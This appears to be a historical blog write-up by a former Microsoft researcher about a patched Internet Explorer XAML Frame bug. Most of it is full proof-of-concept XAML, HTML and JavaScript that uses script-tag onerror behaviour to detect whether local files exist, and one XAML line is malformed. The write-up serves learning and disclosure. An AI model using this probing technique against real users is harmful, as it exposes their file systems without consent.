I was looking at what local file access XAML Frame pages had compared to standard Internet Zone HTML pages. I found that inside a XAML Frame, you could set the src of a <script> element to a local file:// path. Depending on whether the script load triggered an onerror event, you could determine whether the file existed. It is a read-less information disclosure using the error behavior of dynamic script loading.
<Page xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
WindowTitle="xamlFrameClipboardRead">
<TextBlock HorizontalAlignment="Center" VerticalAlignment="Top">
<Bold>This is a XAML Frame:</Bold>
<LineBreak /><LineBreak /><LineBreak />
<<Bold>Frame</Bold> Width="700" Height="600" Source="domain1.html" />
<LineBreak /><LineBreak />
<Frame Width="700" Height="600" Source="ScriptTagCheckIfLocalFileExists.html" />
</TextBlock>
</Page>ScriptTagCheckIfLocalFileExists.html (the HTML page loaded inside the XAML Frame):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>XAML_ScriptTagCheckIfLocalFileExists</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>XAML_ScriptTagCheckIfLocalFileExists</h2>
</center>
If we are inside a Framed XAML, we can load local files vía SCRIPT tag.<br /><br />
<hr />
Type a fileName and we will check if it exists or not:<br /><br />
<input type="text" size="50" value="c:\Program Files\Internet Explorer\iexplore.exe" id="fileName"> <input type="button" value="Check if Exists" onclick="setScriptSrc()"><br /><br />
<hr />
<br />
We are changing the source of a SCRIPT and checking if there's an error. If there is, it means the file exists.<br /><br />
<hr />
<font color="blue">
window.onerror = function()<br />
{<br />
FILE_EXISTS = true;<br />
return true;<br />
}<br />
document.scripts[0].src = document.all.fileName.value;<br />
</font>
<hr />
<br /><br />
<script language="JavaScript">
var FILE_EXISTS = false;
window.onerror = function()
{
FILE_EXISTS = true;
return true;
}
function setScriptSrc()
{
///////////////////////////////////////THIS LITTLE FIX IS BECAUSE THE FIRST TIME THAT WE TRY, IT DOES NOT THROW THE ERROR///////////////////////////////
if (!window.firstTimeLoaded)
{
document.scripts[0].src = document.all.fileName.value;
setTimeout("setScriptSrc()",1000);
window.firstTimeLoaded = true;
return;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
document.scripts[0].src = document.all.fileName.value;
setTimeout("checkForErrors()",100);
}
function checkForErrors()
{
if (FILE_EXISTS)
{
alert("File Exists!!");
}
else
{
alert("File not found");
}
FILE_EXISTS = false;
}
</script>
</font>
</body>
</html>Inside a XAML Frame, the script engine allowed the src attribute of an existing <script> element to be set to a local file:// path — something the standard Internet Zone would block. When the file exists and is not a valid JavaScript file, the engine attempts to parse it, fails, and fires window.onerror. When the file does not exist at all, no load is attempted and no error fires. The window.onerror handler sets a flag that distinguishes these two outcomes. There’s an interesting quirk in the code: the first attempt doesn’t reliably trigger the error, so the function runs itself twice via setTimeout to get a consistent result.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.